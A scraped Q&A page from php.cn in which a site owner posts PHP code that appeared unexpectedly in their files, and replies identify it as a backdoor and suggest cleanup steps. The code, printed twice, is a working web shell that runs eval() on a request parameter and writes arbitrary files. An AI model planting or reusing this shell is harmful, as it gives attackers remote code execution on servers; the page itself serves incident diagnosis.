Heim > Backend-Entwicklung > PHP-Tutorial > PHP文件莫名其妙的被加了代码,看不懂,求解释

PHP文件莫名其妙的被加了代码,看不懂,求解释

WBOY
Freigeben: 2016-06-06 20:50:30
Original
1093 Leute haben es durchsucht

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>
Nach dem Login kopieren
Nach dem Login kopieren

回复内容:

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>
Nach dem Login kopieren
Nach dem Login kopieren

你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。

第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。

请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。

这是一句话木马。

这就是一句话后门,一眼就看出来了,eval接受的参数可以用来攻击哦!

网站代码、数据目录 “可执行不可写,可写不可执行”,改改权限

Verwandte Etiketten:
php
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage